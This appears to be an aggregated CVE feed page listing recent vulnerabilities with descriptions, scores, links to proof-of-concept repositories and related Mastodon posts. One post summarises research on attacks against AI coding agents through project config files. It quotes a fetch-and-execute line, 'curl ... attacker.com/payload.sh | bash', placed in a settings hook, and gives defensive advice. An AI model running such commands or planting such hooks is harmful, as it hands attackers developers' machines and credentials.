https://www.yazoul.net/advisory/cve/cve-2026-33454-apache-camel-header-injection-via-email

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-31659
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:31:56

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: reject oversized global TT response buffers batadv_tt_prepare_tvlv_global_data() builds the allocation length for a global TT response in 16-bit temporaries. When a remote originator advertises a large enough global TT, the TT payload length plus the VLAN header offset can exceed 65535 and wrap before kmalloc(). The

thehackerwire@mastodon.social at 2026-04-28T02:22:48.000Z ##

🔴 CVE-2026-31659 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: reject oversized global TT response buffers

batadv_tt_prepare_tvlv_global_data() builds the allocation length for a
global TT response in 16-bit temporaries. When a ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31659/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31663
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:31:55

1 posts

In the Linux kernel, the following vulnerability has been resolved: xfrm: hold dev ref until after transport_finish NF_HOOK After async crypto completes, xfrm_input_resume() calls dev_put() immediately on re-entry before the skb reaches transport_finish. The skb->dev pointer is then used inside NF_HOOK and its okfn, which can race with device teardown. Remove the dev_put from the async resumpti

thehackerwire@mastodon.social at 2026-04-28T02:23:06.000Z ##

🟠 CVE-2026-31663 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

xfrm: hold dev ref until after transport_finish NF_HOOK

After async crypto completes, xfrm_input_resume() calls dev_put()
immediately on re-entry before the skb reaches transpor...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31663/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3008
(6.6 MEDIUM)

EPSS: 0.01%

updated 2026-04-27T15:30:52

1 posts

Successful exploitation of the string injection vulnerability could allow an attacker to obtain memory address information or crash the application.

3 repos

https://github.com/rakeshelamaran98/CVE-2026-30081

https://github.com/llgsjsm/cve-2026-3008

https://github.com/Cr0wld3r/CVE-2026-30082

beyondmachines1@infosec.exchange at 2026-04-28T13:01:28.000Z ##

Notepad++ Patches Critical Format String Injection Flaw

Notepad++ version 8.9.4 patches a critical format string injection vulnerability (CVE-2026-3008) that allow attackers to crash the application or leak sensitive memory data via malicious language packs.

**If you use Notepad++, update to version 8.9.4 immediately through the official website or built-in updater, especially if you use a non-English language pack. Only download language packs from the official Notepad++ source, never from forums or third-party sites.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/notepad-patches-critical-format-string-injection-flaw-w-m-g-l-s/gD2P6Ple2L

##

CVE-2026-31637
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:30:46

1 posts

In the Linux kernel, the following vulnerability has been resolved: rxrpc: reject undecryptable rxkad response tickets rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then parses the buffer as plaintext without checking whether crypto_skcipher_decrypt() succeeded. A malformed RESPONSE can therefore use a non-block-aligned ticket length, make the decrypt operation fail, and still d

thehackerwire@mastodon.social at 2026-04-28T03:08:05.000Z ##

🔴 CVE-2026-31637 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

rxrpc: reject undecryptable rxkad response tickets

rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then
parses the buffer as plaintext without checking whether
cry...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31637/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40261
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-25T18:12:00.320000

1 posts

Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping, and additionally in the Perforce::generateP4Command() method as in GHSA-wg36-wvj6-r67p / CVE-2026-40176, which interpolates user-supplied

2 repos

https://github.com/terminat0r7031/composer-CVE-2026-40261-CVE-2026-40176-PoC

https://github.com/daptheHuman/cve-2026-40176-cve-2026-40261

canartuc@mastodon.social at 2026-04-29T15:57:45.000Z ##

Composer (the dominant PHP package manager) shipped 2.9.6 and 2.2.27 LTS in April. The release fixes two command-injection bugs in the Perforce driver. CVE-2026-40261, severity 8.8. A malicious composer.json declares a Perforce repository and the shell runs whether or not Perforce is installed. Packagist disabled Perforce metadata April 10. Most CI build agents kept no audit trail across the ninety days the bug was live.

#PHP #CyberSecurity #DevOps #InfoSec #SupplyChain

##

CVE-2026-6042
(3.3 LOW)

EPSS: 0.01%

updated 2026-04-24T18:01:13.913000

1 posts

A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.

1 repos

https://github.com/jensnesten/CVE-2026-6042-PoC

airtower@woem.men at 2026-04-29T17:44:52.465Z ##

@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).

I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.

Today @Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.

We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.

##

CVE-2026-5450
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-23T18:32:57

1 posts

Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

CVE-2026-3844
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-04-23T04:00:28

1 posts

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited

4 repos

https://github.com/dinosn/CVE-2026-3844

https://github.com/0xgh057r3c0n/CVE-2026-3844

https://github.com/tausifzaman/CVE-2026-3844

https://github.com/im-hanzou/CVE-2026-3844

patrickcmiller@infosec.exchange at 2026-04-29T00:12:00.000Z ##

Over 400,000 sites at risk as hackers exploit Breeze Cache plugin flaw (CVE-2026-3844) https://securityaffairs.com/191267/uncategorized/over-400000-sites-at-risk-as-hackers-exploit-breeze-cache-plugin-flaw-cve-2026-3844.html

##

CVE-2026-35369
(5.5 MEDIUM)

EPSS: 0.02%

updated 2026-04-22T18:31:57

1 posts

An argument parsing error in the kill utility of uutils coreutils incorrectly interprets kill -1 as a request to send the default signal (SIGTERM) to PID -1. Sending a signal to PID -1 causes the kernel to terminate all processes visible to the caller, potentially leading to a system crash or massive process termination. This differs from GNU coreutils, which correctly recognizes -1 as a signal nu

mxey@hachyderm.io at 2026-04-29T17:11:17.000Z ##

“The clearest example is kill -1 (CVE-2026-35369). GNU reads -1 as “signal 1” and asks for a PID. uutils read it as “send the default signal to PID -1”, which on Linux means every process you can see. Yikes!”

wat

##

CVE-2026-5588
(0 None)

EPSS: 0.01%

updated 2026-04-21T16:16:20.540000

1 posts

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules). This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java. This issue affects BC-JAVA: from 1.67 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

##

CVE-2026-33626
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-21T15:04:13

1 posts

## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. ## Affected Versions - **Tested on:** main branch (2026-02-04) -

patrickcmiller@infosec.exchange at 2026-04-28T16:12:04.000Z ##

LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours of Disclosure https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html

##

CVE-2025-61260
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-17T15:24:57.753000

1 posts

A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/

##

CVE-2026-20148
(4.9 MEDIUM)

EPSS: 0.06%

updated 2026-04-17T15:09:46.880000

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 65.07%

updated 2026-04-16T19:59:38.107000

2 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

9 repos

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

https://github.com/keraattin/CVE-2026-34197

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/dinosn/CVE-2026-34197

https://github.com/Catherines77/ActiveMQ-EXPtools

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

##

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

##

CVE-2026-20147
(10.0 CRITICAL)

EPSS: 0.28%

updated 2026-04-15T18:32:04

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sendi

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

##

CVE-2025-29787
(0 None)

EPSS: 0.33%

updated 2026-04-15T00:35:42.020000

1 posts

`zip` is a zip library for rust which supports reading and writing of simple ZIP files. In the archive extraction routine of affected versions of the `zip` crate starting with version 1.3.0 and prior to version 2.3.0, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2026-40200
(8.2 HIGH)

EPSS: 0.02%

updated 2026-04-10T18:31:28

1 posts

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).

airtower@woem.men at 2026-04-29T17:44:52.465Z ##

@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).

I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.

Today @Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.

We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.

##

CVE-2025-8065
(6.5 MEDIUM)

EPSS: 0.08%

updated 2026-04-03T18:31:04

2 posts

A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. An unauthenticated attacker on the same local network segment can send specially crafted SOAP XML requests, causing memory overflow and device crash, resulting in denial-of-service (DoS).

threatcodex at 2026-04-29T20:50:46.657Z ##

CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/

##

threatcodex@infosec.exchange at 2026-04-29T20:50:46.000Z ##

CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/

##

CVE-2026-35414
(4.2 MEDIUM)

EPSS: 0.02%

updated 2026-04-02T18:31:50

1 posts

OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon scenarios involving a principals list in conjunction with a Certificate Authority that makes certain use of comma characters.

2 repos

https://github.com/dehobbs/cve_2026_35414

https://github.com/killercd/CVE-2026-35414

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
https://nvd.nist.gov/vuln/detail/CVE-2026-35414
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

##

CVE-2024-1709
(10.0 CRITICAL)

EPSS: 94.32%

updated 2026-03-21T05:29:22

1 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.

Nuclei template

7 repos

https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/HussainFathy/CVE-2024-1709

https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

https://captechgroup.com/about-us/threat-intelligence-center/cisa-adds-connectwise-and-windows-flaws-to-kev-cat-8024b8?utm_source=mastodon&utm_medium=social&utm_campaign=threat_intel&utm_content=cisa-adds-connectwise-and-windows-flaws-to-kev-catalog-exploited-by-apt28

##

CVE-2025-32432
(10.0 CRITICAL)

EPSS: 87.87%

updated 2026-03-20T19:14:20.843000

1 posts

Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additiona

Nuclei template

5 repos

https://github.com/bambooqj/CVE-2025-32432

https://github.com/Sachinart/CVE-2025-32432

https://github.com/Chocapikk/CVE-2025-32432

https://github.com/CTY-Research-1/CVE-2025-32432-PoC

https://github.com/TheMursalin/CVE-2025-32432

exploitdb_bot@mastodon.social at 2026-04-29T11:11:08.000Z ##

🚨 New Exploit: Craft CMS 5.6.16 - RCE
📋 CVE: CVE-2025-32432
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52525

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-32432

##

CVE-2026-21510
(8.8 HIGH)

EPSS: 3.35%

updated 2026-02-11T16:13:25.603000

1 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

1 repos

https://github.com/andreassudo/CVE-2026-21510-CVSS-8.8-Important-Windows-Shell-security-feature-bypass

cyberveille@mastobot.ping.moi at 2026-04-29T12:30:26.000Z ##

📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte

Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/
🌐 source : https://www.akamai.com/blog/security-research/incomplete-patch-apt28s-zero-day-cve-2026-32202
#APT28 #CVE_2026_21510 #Cyberveille

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 87.77%

updated 2026-02-11T15:40:42.937000

1 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

69 repos

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/Mefhika120/Ashwesker-CVE-2026-24061

https://github.com/ibrahmsql/CVE-2026-24061-PoC

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/X-croot/CVE-2026-24061_POC

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/cumakurt/tscan

https://github.com/ekomsSavior/telnet_scan

https://github.com/xuemian168/CVE-2026-24061

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/obrunolima1910/CVE-2026-24061

https://github.com/Risma2025/CVE-2026-24061-GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability

https://github.com/SystemVll/CVE-2026-24061

https://github.com/0xBlackash/CVE-2026-24061

https://github.com/buzz075/CVE-2026-24061

https://github.com/setuju/telnetd

https://github.com/BrainBob/CVE-2026-24061

https://github.com/infat0x/CVE-2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/z3n70/CVE-2026-24061

https://github.com/typeconfused/CVE-2026-24061

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/hyu164/Terrminus-CVE-2026-2406

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/shivam-bathla/CVE-2026-24061-setup

https://github.com/0p5cur/CVE-2026-24061-POC

https://github.com/RStephanH/vuln-deb

https://github.com/tiborscholtz/CVE-2026-24061

https://github.com/SeptembersEND/CVE--2026-24061

https://github.com/Remnant-DB/CVE-2026-24061

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/ridpath/Terrminus-CVE-2026-2406

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/midox008/CVE-2026-24061

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/balgan/CVE-2026-24061

https://github.com/lavabyte/telnet-CVE-2026-24061

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/hackingyseguridad/root

https://github.com/mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/Ali-brarou/telnest

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/scumfrog/cve-2026-24061

https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061

https://github.com/HD0x01/CVE-2026-24061-NSE

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector

https://github.com/przemytn/CVE-2026-24061

https://github.com/0x7556/CVE-2026-24061

https://github.com/h3athen/CVE-2026-24061

https://github.com/ilostmypassword/Melissae-Honeypot-Framework

https://github.com/monstertsl/CVE-2026-24061

https://github.com/franckferman/CVE_2026_24061

https://github.com/killsystema/scan-cve-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/athack-ctf/chall2026-telneted

https://github.com/SafeBreach-Labs/CVE-2026-24061

exploitdb_bot@mastodon.social at 2026-04-29T11:11:05.000Z ##

🚨 New Exploit: GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation
📋 CVE: CVE-2026-24061
👤 Author: aliguliyev

🔗 https://www.exploit-db.com/exploits/52524

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24061

##

CVE-2026-21509
(7.8 HIGH)

EPSS: 10.86%

updated 2026-02-10T15:30:22

1 posts

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

12 repos

https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation

https://github.com/gavz/CVE-2026-21509-PoC

https://github.com/suuhm/CVE-2026-21509-handler

https://github.com/kaizensecurity/CVE-2026-21509

https://github.com/kimstars/Ashwesker-CVE-2026-21509

https://github.com/DameDode/CVE-2026-21509-POC

https://github.com/SimoesCTT/CTT-NFS-Vortex-RCE

https://github.com/YoussefMami/CVE2026_21509

https://github.com/SimoesCTT/SCTT-2026-33-0007-The-OLE-Vortex-Laminar-Bypass-

https://github.com/SimoesCTT/CTT-MICROSOFT-OFFICE-OLE-MANIFOLD-BYPASS-CVE-2026-21509

https://github.com/decalage2/detect_CVE-2026-21509

https://github.com/planetoid/cve-2026-21509-mitigation

threatcodex@infosec.exchange at 2026-04-28T13:30:50.000Z ##

Patch Diffing CVE-2026-21509: Microsoft Office OLE Security Bypass
#CVE_2026_21509
https://blog.78researchlab.com/34cdb461-3e5b-808d-a9c9-dc1338adaccc
